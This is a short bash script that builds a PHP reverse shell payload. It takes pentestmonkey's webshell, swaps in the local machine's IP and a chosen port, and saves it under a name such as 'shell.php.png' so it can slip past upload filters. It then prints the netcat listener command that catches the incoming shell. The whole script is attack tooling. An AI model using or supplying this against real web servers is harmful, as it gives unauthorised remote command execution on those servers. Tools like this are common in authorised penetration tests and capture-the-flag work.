#!/bin/bash
#Quick Edit of github.com/pentestmonkey/php-reverse-shell to add your IP and chosen port using selected interface 
#Example: phpshell eth0 443 shell.php.png

port="${2:-9090}"
file_name="${3:-shell.php}"


if [[ -z $1 ]]; then 

	printf "Please add Interface optional port to set as Host IP; Default port 9090: phpshell eth0 443 shell.php.png"

else

	LHOST=$(ifconfig "$1" | grep -win 'inet' | cut -d " " -f 10)
	sed -e "s/127.0.0.1/$LHOST/g" -e "s/1234/$port/g" /usr/share/webshells/php/php-reverse-shell.php > $file_name
	echo "netcat -nlvp $port"
fi
